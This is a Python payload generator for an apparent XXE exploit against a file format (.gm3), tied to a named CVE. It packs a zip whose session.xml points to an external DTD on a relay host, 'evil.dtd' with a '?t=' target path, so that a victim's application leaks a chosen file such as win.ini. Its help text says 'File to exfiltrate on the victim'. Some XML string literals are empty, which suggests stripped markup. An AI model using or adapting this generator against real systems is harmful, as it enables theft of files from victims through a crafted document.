""" Generates malicious.gm3 for CVE-2026-6807. Target file path is passed to the relay via ?t= in the DTD URL. The relay reads the file server-side and serves back chunked general entities. """ import zipfile, base64, argparse, urllib.parse, os DEFAULT_HOST = "127.0.0.1" DEFAULT_PORT = 7778 DEFAULT_TARGET = "C:/windows/win.ini" DEFAULT_OUTPUT = "malicious.gm3" MAX_CHUNK = 150 parser = argparse.ArgumentParser(description="CVE-2026-6807 payload generator") parser.add_argument("-t", "--target", default=DEFAULT_TARGET, help="File to exfiltrate on the victim") parser.add_argument("--host", default=DEFAULT_HOST, help="Relay listener host") parser.add_argument("--port", type=int, default=DEFAULT_PORT, help="Relay listener port") parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT, help="Output .gm3 path") args = parser.parse_args() # Read target locally to calculate chunk count for entity refs in session.xml try: with open(args.target.replace("/", os.sep), "rb") as f: raw = f.read() encoded = base64.b64encode(raw).decode() chunks = [encoded[i:i+MAX_CHUNK] for i in range(0, len(encoded), MAX_CHUNK)] n = len(chunks) print(f"[*] {args.target}: {len(raw)} bytes -> {n} chunks") except FileNotFoundError: # Target may not exist locally (remote engagement) — ask for chunk count n = int(input(f"[?] Target not found locally. How many chunks to expect? ")) encoded_path = urllib.parse.quote(args.target, safe="") dtd_url = f"http://{args.host}:{args.port}/evil.dtd?t={encoded_path}" entity_refs = "\n ".join(f"&c{i};" for i in range(n)) session_xml = f""" {entity_refs} """ manifest_xml = '\n\n' stub = '\n\n' with zipfile.ZipFile(args.output, "w", zipfile.ZIP_DEFLATED) as zf: zf.writestr("manifest.xml", manifest_xml) zf.writestr("session.xml", session_xml) zf.writestr("logical.xml", stub) zf.writestr("physical.xml", stub) zf.writestr("mesh.xml", stub) print(f"[+] Written {args.output} ({n} entity refs -> {dtd_url})")